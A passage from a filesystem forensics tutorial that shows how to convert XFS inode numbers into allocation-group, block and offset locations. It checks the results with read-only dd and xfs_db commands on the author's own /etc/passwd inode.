Inode addressing is similar. However, because we can have multiple inodes per block, the relative portion of the inode address has to be longer. The length of relative inode addresses is the sum of superblock bytes 123 and 124– the log2 value of inodes per block plus the log2 value of blocks per AG. In our example this is 3+22=25.

The inode address of the root directory isn’t a very interesting example– it’s just inode offset 64 from AG 0. For a more interesting example, I’ll use my /etc/passwd file at inode 67761631 (0x409f5df). Let’s take a look at the bits:

     0x409f5df   =    0100 0000 1001 1111 0101 1101 1111
  AG# in upper 3 bits---/\---25 bits of relative inode

So the /etc/passwd file uses inode 0x9f5df (652767) in AG 2.

Where does this inode physically reside on the storage device? The relative block location of an inode in XFS is simply the integer portion of the inode number divided by the number of inodes per block. In our case this is 652767 div 8 or block 81595. The inode offset in this block is 672767 mod 8, which equals 7.

Now that we know the AG and relative block number for this inode, we can extract it as we did the first block of the journal. We can even use a second dd command to extract the correct inode offset from the block:

[root@localhost XFS]# dd if=/dev/mapper/centos-root bs=4096 \ 
                              skip=$((2*2427136 + 81595)) count=1 | 
                      dd bs=512 skip=7 count=1 | xxd
0000000: 494e 81a4 0302 0000 0000 0000 0000 0000  IN..............
0000010: 0000 0001 0000 0000 0000 0000 0000 0000  ................
[...]

Note that the xfs_db program can perform address conversions for us. However, in order to use xfs_db it must be able to attach to the file system in order to have the correct length for the AG relative portion of the address. Since this may no always be possible, knowing how to manually convert absolute addresses is definitely a useful skill.

Here is how to get xfs_db to convert the block and inode addresses we used in the examples above:

[root@localhost XFS]# xfs_db -r /dev/mapper/centos-root
xfs_db> convert fsblock 0x800004 agno
0x2 (2)
xfs_db> convert fsblock 0x800004 agblock
0x4 (4)
xfs_db> convert inode 67761631 agno
0x2 (2)
xfs_db> convert inode 67761631 agino
0x9f5df (652767)
xfs_db> convert inode 67761631 agblock
0x13ebb (81595)
xfs_db> convert inode 67761631 offset
0x7 (7)

The first two commands convert the starting block of the journal (xfs_db refers to absolute block addresses as “fsblock” values) to the AG number (agno) and AG relative block offset (agblock). We can also use the convert command to translate inode addresses. Here we calculate the AG number, AG relative inode (agino), the AG relative block for the inode, and even the offset in that block where the inode resides (offset). The values from xfs_db match the values we calculated manually above. You will note that we can use either hex or decimal numbers as input.

Now that we can locate file system structures on disk, Part 2 of this series will focus on the XFS inode format. I hope you will return for the next installment.